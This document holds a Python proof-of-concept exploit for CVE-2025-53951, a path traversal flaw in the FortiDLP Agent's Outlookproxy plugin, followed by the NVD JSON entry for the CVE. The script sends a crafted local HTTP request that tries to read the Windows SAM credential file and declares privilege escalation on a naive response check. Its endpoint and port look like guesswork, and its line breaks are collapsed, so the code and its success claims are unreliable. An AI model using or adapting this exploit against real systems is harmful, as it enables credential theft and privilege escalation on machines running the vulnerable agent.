CVE-2025-53951

# CVE-2025-53951 - Fortinet FortiDLP Agent Outlookproxy Path Traversal PoC # Exploits improper path limitation (CWE-22) for privilege escalation to LocalService # Affected: FortiDLP Agent Windows versions 10.3.1 through 11.5.1 import socket import sys TARGET_HOST = "127.0.0.1" # Localhost - plugin listens on a local port TARGET_PORT = 49152 # Default Outlookproxy plugin listening port (may vary) def build_path_traversal_payload(target_path="..\\..\\..\\Windows\\System32\\config\\SAM"): """ Build a crafted request with path traversal sequences to exploit CWE-22 in the FortiDLP Agent Outlookproxy plugin. """ # The Outlookproxy plugin processes requests containing file path references. # By injecting traversal sequences, the attacker can escape the intended directory. payload = ( f"GET /outlookproxy/file?path={target_path} HTTP/1.1\r\n" f"Host: {TARGET_HOST}:{TARGET_PORT}\r\n" f"User-Agent: Mozilla/5.0\r\n" f"Connection: close\r\n" f"\r\n" ) return payload.encode() def exploit(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((TARGET_HOST, TARGET_PORT)) print(f"[+] Connected to {TARGET_HOST}:{TARGET_PORT}") payload = build_path_traversal_payload() sock.send(payload) print(f"[+] Sent path traversal payload") response = sock.recv(4096) print(f"[+] Received response:\n{response.decode(errors='ignore')}") # If the traversal succeeds, the response may contain sensitive data # or confirm access to restricted resources, indicating LocalService # level access has been achieved. if b"200 OK" in response or b"success" in response.lower(): print("[!] Path traversal succeeded - privilege escalation possible") print("[!] LocalService context achieved") sock.close() except Exception as e: print(f"[-] Exploit failed: {e}") sys.exit(1) if __name__ == "__main__": print("[*] CVE-2025-53951 PoC - Fortinet FortiDLP Agent Path Traversal") print("[*] Targeting Outlookproxy plugin local listening port") exploit()

{"cve": {"id": "CVE-2025-53951", "sourceIdentifier": "[email protected]", "published": "2025-10-16T14:15:36.070", "lastModified": "2025-10-16T17:54:44.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability [CWE-22] in Fortinet FortiDLP Agent's Outlookproxy plugin for Windows 11.5.1 and 11.4.2 through 11.4.6 and 11.3.2 through 11.3.4 and 11.2.0 through 11.2.3 and 11.1.1 through 11.1.2 and 11.0.1 and 10.5.1 and 10.4.0, and 10.3.1 may allow an authenticated attacker to escalate their privilege to LocalService via sending a crafted request to a local listening port."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortidlp_agent:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.3.1", "versionEndIncluding": "11.5.1", "matchCriteriaId": "C1DB36F0-999E-467A-82F9-2A203F69F423"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-628", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}